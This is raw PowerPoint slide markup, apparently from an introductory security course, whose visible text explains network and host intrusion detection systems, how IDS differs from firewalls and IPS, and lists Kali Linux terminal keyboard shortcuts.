                    <a:pt x="46604" y="199922"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="46604" y="219582"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27284" y="222949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="222949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="219582"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="159437" y="199922"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46604" y="199922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46604" y="219582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159437" y="199922"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="1177793" y="76566"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="92980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193215" y="98571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="76566"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="1224397" y="76566"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="76566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193215" y="98571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224397" y="98571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224397" y="76566"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="1177919" y="43274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1040691" y="43274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052610" y="44294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046462" y="45366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="92980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177793" y="76566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224397" y="76566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224397" y="60118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177919" y="43274"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1224915" h="1751329">
                  <a:moveTo>
                    <a:pt x="1040691" y="43274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1046462" y="45366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052610" y="44294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1040691" y="43274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8" name="object 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63EBC6A0-6C48-F0C7-2CE7-C594CA814CC6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9" name="object 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E9FB7A7-5F08-610F-1B51-68495CEF4212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116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67226177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4EC4D78-C7DB-A7F8-3E1E-588B8B281AE2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496149B-1B4B-36A6-0AAC-1232B30CEFA8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IDS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34DC119-8957-19EE-5057-165F6418BC9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1676211"/>
            <a:ext cx="46443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IDSs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fall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into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two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main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categories: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E3D10DA9-EF67-A491-65EF-DB21F649ED44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1544408" y="2377555"/>
            <a:ext cx="2539365" cy="1524000"/>
            <a:chOff x="1422653" y="2376677"/>
            <a:chExt cx="2539365" cy="152400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20AB524D-6172-4F38-6D46-F619A518FA64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1422653" y="2376677"/>
              <a:ext cx="2539365" cy="1524000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2539365" h="1524000">
                  <a:moveTo>
                    <a:pt x="2386584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1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="1419782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="1461619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="1494605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="1516233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="1524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2386584" y="1524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434766" y="1516233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476603" y="1494605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509589" y="1461619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531217" y="1419782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538984" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538984" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531217" y="104217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509589" y="62380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476603" y="29394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434766" y="7766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238658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204BAF5D-2D60-76DB-0C9D-E8FB4E33C1C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1422653" y="2376677"/>
              <a:ext cx="2539365" cy="1524000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2539365" h="15240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386584" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434766" y="7766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476603" y="29394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509589" y="62380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531217" y="104217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538984" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538984" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531217" y="1419782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509589" y="1461619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476603" y="1494605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434766" y="1516233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2386584" y="1524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="1524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="1516233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="1494605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="1461619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="1419782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15240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7F94356A-038E-B1A4-2986-2F144CCC98FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674838" y="2572323"/>
            <a:ext cx="2274570" cy="10610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>
            <a:defPPr>
              <a:defRPr kern="0"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" marR="5080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="91500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="34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Intrusion Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="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(NIDS)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53D16AB9-7F18-2212-421B-65D9C741E5C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5098376" y="2377555"/>
            <a:ext cx="2539365" cy="1524000"/>
            <a:chOff x="4976621" y="2376677"/>
            <a:chExt cx="2539365" cy="1524000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6DD22A81-D2A0-9E3D-1D62-9FBB4177117F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976621" y="2376677"/>
              <a:ext cx="2539365" cy="1524000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2539365" h="1524000">
                  <a:moveTo>
                    <a:pt x="2386583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1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="1419782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="1461619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="1494605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="1516233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="1524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2386583" y="1524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434766" y="1516233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476603" y="1494605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509589" y="1461619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531217" y="1419782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538983" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538983" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531217" y="104217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509589" y="62380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476603" y="29394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434766" y="7766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23865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8C534718-6ACC-56C6-82C4-F955759F0954}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976621" y="2376677"/>
              <a:ext cx="2539365" cy="1524000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2539365" h="15240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386583" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434766" y="7766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476603" y="29394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509589" y="62380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531217" y="104217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538983" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538983" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531217" y="1419782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509589" y="1461619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476603" y="1494605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434766" y="1516233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2386583" y="1524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="1524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="1516233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="1494605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="1461619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="1419782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13716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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8586F199-D884-0737-7273-C7D2AF15EABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5429339" y="2572323"/>
            <a:ext cx="1875155" cy="10610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>
            <a:defPPr>
              <a:defRPr kern="0"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="1270" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="91500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="34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Host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Intrusion Detection Systems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(HIDS)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0E359EF3-01DE-D6AC-EE94-D5A5545B8797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88DE355C-8C0D-BF98-D5E4-C48245190A6C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117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90024661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86166C1-EB5A-52C7-D940-2C580694A60F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445605" y="4730295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D6FB7F8-2B42-C09B-21E2-9BCEFF6F698D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533031" y="185345"/>
            <a:ext cx="676719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12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NIDS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49F13FE-218C-34AA-EFC7-DE174D65FBF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232108" y="4766534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5691E38-7ABB-A598-B967-FA4894C480B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232108" y="4777180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118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060B2E9-B369-C539-6A5A-5F5ED864ABDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="2181532"/>
            <a:ext cx="79419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intrusion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detection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systems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inspect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network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traffic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means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sensors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which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usually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placed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a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router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with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high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intrusion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risk,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like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DMZ.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4352122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30E07A9-031D-DF66-64E0-B202D7F7F152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445605" y="4730295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E24C8D8-EF59-E719-9B4B-EB1FF01439BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533031" y="185345"/>
            <a:ext cx="676719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 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HIDS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0F31121-5462-4D9A-D65D-17808911D91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232108" y="4766534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AD39EEE-B71D-5045-F8C4-D79DA8A0F9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232108" y="4777180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119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8F05903-9FE0-9ACC-613B-00D2E6D5B6BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="2181532"/>
            <a:ext cx="75857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other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hand,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host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IDS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sensors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monitor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application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logs,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file-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system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changes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changes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operating system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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configuration.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9084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A3E7-D366-F0C8-2C29-6DA3FACA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198DE-FE62-EC05-9038-578D8C2EB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A39D798-59E3-E540-F1E4-15077179D94C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FF21A3C-455D-C4AF-5C44-05752A707B1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9352637-F658-1CFA-1A20-2B3636E19F1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12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C418491-8EAE-43B1-58E0-26B5FBEA67BF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D4FE7694-98BA-AA16-288C-95A4A5062B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B5EF9DFC-9087-8C7D-B49C-F2A08F938A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7705C84C-6473-0107-2F48-7C74114C2DBA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38EDEE6-5D9F-8B3C-B5EF-B015B7A2FC70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FA703855-E819-7E4F-BCB4-49624380EB7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2E6AC704-1058-10DF-61D9-91D84966D361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A04BBFB7-35AE-02F6-0BC3-3AFB36D88050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20BA6F49-EE4D-7C95-3940-5A2A84BFB33C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12</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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D53E3855-C3E4-4F55-FE5E-5D75DF55D109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7422590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1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>Important abbreviations in Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>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19F07076-7D52-5AFF-151C-41D16F00B553}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467583" y="1915698"/>
            <a:ext cx="29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- Ctrl + Shift +  =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D4AFE1-B157-291A-92B5-5E6FB6E35D80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589007" y="2079409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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E6080D-B49D-434A-3DC1-5D101DE58632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4513363" y="1876878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Zoom in Terminal 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1F1A7B05-1CD1-B43C-9F1A-64BF446C29E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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Ctrl + -     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EA95D1-5F12-24B4-8E7F-F31517F7ECC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094190" y="2511361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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B4A95B-FF61-C774-19F0-8EF50A4ACE1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139996" y="2313214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Zoom out Terminal </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{198B6879-964F-C95D-8DE2-A1DBD7239908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="2724150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 Ctrl + 0   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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8544C3-31CB-C44A-090A-110682CF6017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612097" y="2926327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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F030FD91-8502-07EE-2621-8AE1DC013ED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4137254" y="2749550"/>
            <a:ext cx="3113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Reset Zoom Terminal </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827EF510-1429-B5C5-D515-C29EE98B6936}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="3184323"/>
            <a:ext cx="331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 Ctrl + Shift + T</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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2C1E1E4B-3289-84F3-998C-9B4B847BDE3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3969298" y="3214963"/>
            <a:ext cx="300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Tab in Terminal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346B87-C2CA-4C33-9636-0B07581B9C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411184" y="3418859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5C041E-58DD-47B4-BBA8-B08030FCE400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2945447" y="3835764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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0D88AE6-4FF3-19A8-C10E-540AABABAAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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- Ctrl + Shift + R   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E5103A-F6D2-4FF4-33A7-C0953B77E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339057" y="3661575"/>
            <a:ext cx="36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Terminal division</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322883357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1ED510B-1D7F-44BD-0DF7-09F4639447B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459816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IPS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35A2B31-1664-FB5E-426C-E3566195CF8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459207" y="1249999"/>
            <a:ext cx="778129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IDSs,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unlike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firewalls,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detect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suspicious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activities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and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report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them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administrator.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Suspicious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activity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logged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future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analysis,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but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b="1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b="1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4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blocked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937EEF2A-850C-D2D4-0731-D7BA91663190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="783133" y="2472805"/>
            <a:ext cx="7581113" cy="2433916"/>
            <a:chOff x="734593" y="2471927"/>
            <a:chExt cx="7581113" cy="2433916"/>
          </a:xfrm>
        </p:grpSpPr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11C45D65-145C-0765-1D36-3570FE9A298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4300" y="2941319"/>
              <a:ext cx="1223772" cy="1508760"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C74336B3-4C75-D899-54A0-176BAD1A6AF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6238" y="2471927"/>
              <a:ext cx="1758188" cy="1223772"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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97389729-5ADA-2E1A-CC11-D91A04A5B67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593" y="3542283"/>
              <a:ext cx="1131163" cy="1363560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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42957894-AD27-5E6A-9496-62BB09D59E84}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1879473" y="3832225"/>
              <a:ext cx="2044700" cy="398145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="385610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2285" y="398119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007713" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024518" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:lnTo>
